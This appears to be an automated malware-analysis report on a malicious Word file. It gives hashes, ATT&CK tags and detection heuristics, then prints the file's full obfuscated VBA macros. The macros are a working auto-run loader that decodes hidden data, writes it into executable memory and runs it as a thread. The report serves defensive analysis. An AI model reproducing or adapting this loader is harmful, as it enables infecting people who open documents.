Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1cb2bc858327f99…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 165.5 KB
Created: 2016-12-12 14:25:00
Authoring application: Microsoft Office Word
First seen: 2016-12-24
MD5: f053e1d0be18c1603b3bebeaeaec7001
SHA-1: b959f40d7dd9758e7e13a9e18475f87b99fa0611
SHA-256: e1cb2bc858327f9967a3631056f7e513af17990d87780e4ee1c01bc141d3dc7f
Risk score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The presence of VBA macros, specifically a Document_Open subroutine, together with the critical heuristic for a WriteProcessMemory API reference, indicates that the document is designed to execute malicious code when it is opened. The ClamAV detection 'Doc.Dropper.Agent-1887388' supports this and points to dropper functionality. No specific URLs or executable payloads were directly extracted, so the malware family is unknown.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-1887388 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1887388
  • Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY)
    The extracted script contains a reference to the WriteProcessMemory API.
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    The document defines a Document_Open macro, which Word runs automatically when the document is opened. Matched lines in script:
        End Function
        Private Sub Document_Open()
        Dim selfpropelled As Long
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
      • http://ns.adobe.com/xap/1.0/
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://ns.adobe.com/photoshop/1.0/
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/xap/1.0/mm/
      • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef#

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14180 bytes
SHA-256: 6436e4bd700273839644efe5d94fdfe1d3d4f5b752c6163b84687cb46e5c4fb7

Extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

Function matchbook(pcoat, forgot, antlered)
#If Win64 Then
Dim gazetted As Variant
Dim airplane As LongPtr
Dim bunter As LongPtr
Dim womanizer As LongPtr
Dim bleb As String
Dim merganser As LongPtr
Dim carotene As LongPtr
#Else
Dim bunter As Long
Dim ascendency As Long
Dim airplane As Long
Dim melanesia As Variant
Dim merganser As Long
Dim frigorific As Integer
Dim womanizer As Long
Dim homolousian As Long
Dim carotene As Long
Dim changtzu As Byte
Dim bowl As Long
#End If
bunter = pcoat
merganser = forgot
penile = 12
Do While True
fingerspelling = Int(212.395)
penile = penile - 2
If penile = 10 Then Exit Do
ecrhythmus = "invoker"
Loop

airplane = -1
illhumored = "mandibulate"
carotene = antlered
schonheit = "boatbuilder"
geophytic ByVal airplane, bunter, merganser, carotene, womanizer
epipactis = 24
Do While True
arthrosporic = fingerspelling * 2
epipactis = epipactis - 2
If epipactis = 22 Then Exit Do
bleached = ecrhythmus
Loop

End Function
Private Sub Document_Open()
Dim selfpropelled As Long
Dim selfacting As Variant
placatingly = "missile"
chianti
cockahoop = 16
Do While True
impregnability = Abs(134.576)
cockahoop = cockahoop - 2
If cockahoop = 14 Then Exit Do
bleached = "brashness"
Loop
End Sub
Function flameproof(chinking)
Dim ruffled As Long
Dim classes As Long
Dim impelling As Integer
Dim soybean As Variant
#If Win64 Then
Dim lh As String
Dim epingles As LongPtr
pyrrhic = 8
Dim churchman As Integer
Dim mohammedanism As LongPtr
Dim commendatio As Byte
Dim riparia As LongPtr
Dim asserting As Long
#Else
Dim adventitial As String
Dim epingles As Long
pyrrhic = 4
Dim mohammedanism As Long
Dim realist As Variant
Dim riparia As Long
Dim merginae As Integer
Dim paltry As Byte
#End If
nap = matchbook(VarPtr(epingles), VarPtr(chinking) + 8, pyrrhic)
boaster = -1
mohammedanism = 24 - 24
nast = 0
riparia = 81 + 9240
addlepated = 4096
clavichord = 64
intervenient = campagne(ByVal boaster, mohammedanism, ByVal nast, riparia, ByVal addlepated, ByVal clavichord)
ecrhythmus = "natare"

arthrosporic = Int(141.48)

matchbook mohammedanism, epingles, 57 + 50 + 49 + 5438
boundlessness = 65
urdu = 59
If (boundlessness + urdu) Then
bleached = ecrhythmus
bleached = chokefull
Else
impregnability = Abs(67.374)
impregnability = Round(378.79)
urdu = 76
End If

flameproof = mohammedanism
End Function
Sub chianti()
Dim aglow As Byte
Dim atilt As Byte
Set whalesucker = redeem.unfortunately.Tabs
For Each arenga In whalesucker
ferrule = 60
pickeringia = 68
If (ferrule + pickeringia) Then
impregnability = Fix(58.154)
arthrosporic = fingerspelling + 315
Else
ecrhythmus = "gatepost"
arthrosporic = Abs(66.1173)
pickeringia = 27
End If

If arenga.Index = 9 Then
gastrophryne = "kharkov"
heliographic = "ho" & "teli" & "er"
cretonne = "fiesta"
popin = arenga.Name
End If
Next
traded = 7460
proviso = Right(popin, traded)
waterrepellent = casehardened.ateles(proviso)
agaricus = 57
alsatia = 95
If (agaricus + alsatia) Then
bleached = "bombay"
impregnability = impregnability - 416
Else
fingerspelling = Fix(158.349)
fingerspelling = arthrosporic / 304
alsatia = 33
End If

pitching = "trying"
tinsmith = "burseraceae"
#If Win64 Then
Dim googly As Variant
Dim altruist As LongPtr
Dim inside As LongPtr
Dim stridor As String
#Else
Dim mirabilis As Integer
Dim inside As Long
Dim cyprinidae As Integer
Dim altruist As Long
#End If
motivated = 12 - 54 + 29 + 13
outmaneuver = "gavial"
reassert = "nineteenth"
flirt = 2 - 124 - 21 + 4239
jovian = 99
acervatim = 56
If (jovian + acervatim) Then
fingerspelling = fingerspelling - 126
fingerspelling = fingerspelling / 460
Else
ecrhythmus = bleached
bleached = ecrhythmus
acervatim = 71
End If

nebulously = "bathetic"
cashable = "scorching"
unconventionally = "burried"
lachrymation = "bi"
abba = 16
Do While True
impregnability = Abs(422.1333)
abba = abba - 2
If abba = 14 Then Exit Do
chokefull = "suety"
Loop

andropogon = waterrepellent
manycolored = "abetalipoproteinemia"
altruist = flameproof(andropogon)
doux = "fuck"
aloof = "apetalous"
#If VBA6 And Win64 Then
Dim campfire As String
Dim orbicular As LongPtr
stickler = "monogamist"
puttyroot = "ri" & LCase$("GIdI") & "ty"
charakter = "aztecan"
Dim contraception As LongPtr
fallen = 116 + 30 + 1134
#ElseIf Win32 Then
gallant = "cosmical"
pilot = "palpation"
Dim orbicular As Long
cenotaph = 106 - 51 - 59 + 518
Dim contraception As Long
fallen = cenotaph + 3204

#End If
Dim insipid As Byte
Dim rois As Byte
orbicular = 100 - 127 + 121 - 94
inside = altruist + fallen
contraception = 2 - 87 + 92 - 6
oppose = wrangler(inside, orbicular, contraception, orbicular)
transplant = 50
ineffaceable = 69
If (transplant + ineffaceable) Then
arthrosporic = Abs(365.955)
arthrosporic = impregnability * 2
Else
ecrhythmus = bleached
ecrhythmus = ecrhythmus
ineffaceable = 96
End If

End Sub


Attribute VB_Name = "casehardened"
' And thing to be found
' And thing to be found
' With so many light years to go
#If Win64 Then
' The final countdown
' But still it's farewell
' Will things ever be the same again
Public Declare PtrSafe Function raceculture Lib "Shell32.dll" Alias "SHGetDesktopFolder" (perform As LongPtr)
' I'm sure that we'll all miss her so
' And welcome us all
' We're leaving ground
Public Declare PtrSafe Function monosemous Lib "Kernel32.dll" Alias "SetSystemTime" (defame As LongPtr) As Boolean
' But still it's farewell
' Will things ever be the same again
' I'm sure that we'll all miss her so
Public Declare PtrSafe Function bluishness Lib "Kernel32.dll" Alias "LocalFree" (bilabiate As LongPtr) As LongPtr
' But still it's farewell
' And still we stand tall
' п»їWe're leaving together
Public Declare PtrSafe Function wrangler Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal meleagris As LongPtr, ByVal chopin As Any, ByVal embarcation As LongPtr, ByVal loggan As LongPtr) As LongPtr
' I guess there is no one to blame
' And welcome us all
' Cause maybe they've seen us
Public Declare PtrSafe Function decortication Lib "Shell32.dll" Alias "SHValidateUNC" (boringly As LongPtr, particular As Any,bivalvia As LongPtr) As Boolean
' We're leaving ground
' Cause maybe they've seen us
' Cause maybe they've seen us
Public Declare PtrSafe Function apia Lib "Shell32.dll" Alias "SHGetSettings" (ctenizidae As LongPtr,heathendom As LongPtr) As LongPtr
' I'm sure that we'll all miss her so
' I'm sure that we'll all miss her so
' We're leaving ground
Public Declare PtrSafe Function geophytic Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal emergence As Any, ByVal korean As Any, ByVal considerately As Any, ByVal fiji As Any, ByVal arabian As Any) As LongPtr
' And maybe we'll come back
' The final countdown
' We're leaving ground
Public Declare PtrSafe Function campagne Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (beriberi As LongPtr, earthborn As LongPtr, ByVal didactically As LongPtr,responsibilityByVal As LongPtr, incipience As LongPtr, ByVal speckle As LongPtr) As LongPtr
' Cause maybe they've seen us
' And welcome us all
' To earth, who can tell

' We're heading for Venus
' And thing to be found
' And thing to be found
#Else
' We're leaving ground
' And still we stand tall
' I'm sure that we'll all miss her so
Public Declare Function evolvement Lib "Kernel32.dll" Alias "LocalFree" (kinesthetically As Long) As Long
' But still it's farewell
' It's the final countdown
' And still we stand tall
Public Declare Function capreolus Lib "Kernel32.dll" Alias "SetSystemTime" (gathering As Long) As Boolean
' And welcome us all
' It's the final countdown
' The final countdown
Public Declare Function wrangler Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal haughtiness As Long, ByVal milady As Any, ByVal centrical As Any, ByVal dashpot As Any) As Long
' With so many light years to go
' And welcome us all
' To earth, who can tell
Public Declare Function cadere Lib "Shell32.dll" Alias "SHGetSettings" (pantograph As Long, feudality As Long) As Long
' To earth, who can tell
' With so many light years to go
' And thing to be found
Public Declare Function twain Lib "Shell32.dll" Alias "SHGetDesktopFolder" (appreciably As Long)
' We're leaving ground
' I'm sure that we'll all miss her so
' We're heading for Venus
Public Declare Function geophytic Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal arrant As Any, ByVal becomingly As Any, ByVal rocker As Any, ByVal alopecia As Any, ByVal aftergame As Any) As Long
' We're leaving ground
' I'm sure that we'll all miss her so
' We're heading for Venus
Public Declare Function allometric Lib "Shell32.dll" Alias "SHValidateUNC" (ample As Long, halving As Any, albacore As Long) As Boolean
' It's the final countdown
' The final countdown
' And welcome us all
Public Declare Function campagne Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (hypnotist As Long, undamaged As Long, ByVal biform As Long, calcinationByVal As Long, acheron As Long, ByVal communism As Long) As Long
' And maybe we'll come back
' And welcome us all
' And still we stand tall

' To earth, who can tell
' I'm sure that we'll all miss her so
' It's a final countdown
#End If
' We're heading for Venus
' п»їWe're leaving together
' п»їWe're leaving together
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

Function cocktail(abudefduf, butchery)
cocktail = abudefduf \ butchery
bleached = chokefull

End Function
Function bever(anility, dramaturgy)
bever = anility And dramaturgy
End Function
Function polygonum(toity, monoculous)
polygonum = toity * monoculous
End Function
Function gritty(monad)
gritty = AscW(monad)
End Function
Function ateles(catoptrics) As String
Dim forcibly() As Byte
Dim nonapparent As Integer
Dim balarama As String
Dim unbribed(63) As Long
Dim tripodic(63) As Long
Dim iguanodon As Long

Dim hacker As Long
arthrosporic = Abs(145.765)

arthrosporic = Fix(91.89)

Dim apologist As Long
Dim ventilated As Long
Dim begreasedabble As Long
Dim blotchy(6965) As Byte
Dim linctus(63) As Long
Dim kolkwitzia As Long

Dim swordshaped As Variant

Dim hindi(255) As Byte
murky = 64
Dim dauber As String

hater = 65280
underclothing = 16515072
salvelinus = 256
constellation = 13 + 258035
handbarrow = 4096
unpigmented = 70 - 117 + 16711727
acidity = 72 - 9
anesthyl = 8 + 75 + 49 + 262012
Dim pilosella As Variant

Dim fowls As Long

connarus = 21 + 65515
denunciatory = 4032
benzenoid = 8 - 22 + 269
Dim andean As Variant
unpriced = 0
Conjunction = 7459
Dim swineherd() As Byte
swineherd = StrConv(catoptrics, vbFromUnicode)
Dim vivant As Long
veronica = 8
Do While True
chokefull = bleached
veronica = veronica - 2
If veronica = 6 Then Exit Do
bleached = ecrhythmus
Loop

fiji = 7459
it = 35
pancreatitis = Log(100) / Log(10) + 11
For hiawatha = 0 To fiji
swineherd(hiawatha) = swineherd(hiawatha) + pancreatitis
Next hiawatha
entirely = 4
Do While True
arthrosporic = Abs(422.513)
entirely = entirely - 2
If entirely = 2 Then Exit Do
ecrhythmus = "freehold"
Loop

nonapparent = 0
alternativeness = 111 - 34 - 83 + 128
tranquilizer = 255
maggot = 19 - 96 + 77
berserk = 43
For apologist = maggot To tranquilizer
If (apologist >= 65 And apologist <= 90) Then hindi(apologist) = apologist - 65
If (apologist >= 97 And apologist <= 122) Then hindi(apologist) = apologist - 71
If (apologist >= 48 And apologist <= 57) Then hindi(apologist) = apologist + 4
If apologist = berserk Then hindi(apologist) = 62
If apologist = 47 Then hindi(apologist) = 63
Next apologist
For apologist = 0 To 63
unbribed(apologist) = polygonum(apologist, murky)
linctus(apologist) = polygonum(apologist, handbarrow)
tripodic(apologist) = polygonum(apologist, anesthyl)
Next apologist
earnest = 74
jurisprudentially = 78
If (earnest + jurisprudentially) Then
impregnability = arthrosporic Or 167
arthrosporic = Abs(390.982)
Else
ecrhythmus = bleached
fingerspelling = impregnability \ 496
jurisprudentially = 40
End If

forcibly = swineherd
outrun = 4
miasm = 76
oratorical = 86
If (miasm + oratorical) Then
impregnability = Int(399.1002)
fingerspelling = Fix(131.1025)
Else
impregnability = Int(420.898)
chokefull = "happygolucky"
oratorical = 75
End If

minutely = 82 - 108 + 29
impregnability = Round(408.612)

arthrosporic = fingerspelling + 490

broadloom = minutely + 1
longsuffering = 114 + 120 - 84 - 148
For hacker = 0 To fiji
redletter = forcibly(hacker)
meniscium = forcibly(hacker + 2)
ventilated = tripodic(hindi(redletter)) _
 + linctus(hindi(forcibly(hacker + 1))) + unbribed(hindi(meniscium)) + hindi(forcibly(hacker + minutely))
apologist = bever(ventilated, unpigmented)
blotchy(begreasedabble) = cocktail(apologist, connarus)
apologist = bever(ventilated, hater)
blotchy(begreasedabble + 1) = cocktail(apologist, salvelinus)
blotchy(begreasedabble + longsuffering) = bever(ventilated, benzenoid)
begreasedabble = begreasedabble + longsuffering + 1
hacker = hacker + 3
Next
ateles = blotchy
End Function



Attribute VB_Name = "redeem"
Attribute VB_Base = "0{3C159F69-442C-4593-9144-E3A871DF12C2}{64F3A9DA-E44C-4546-B4ED-1F519B4C92EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False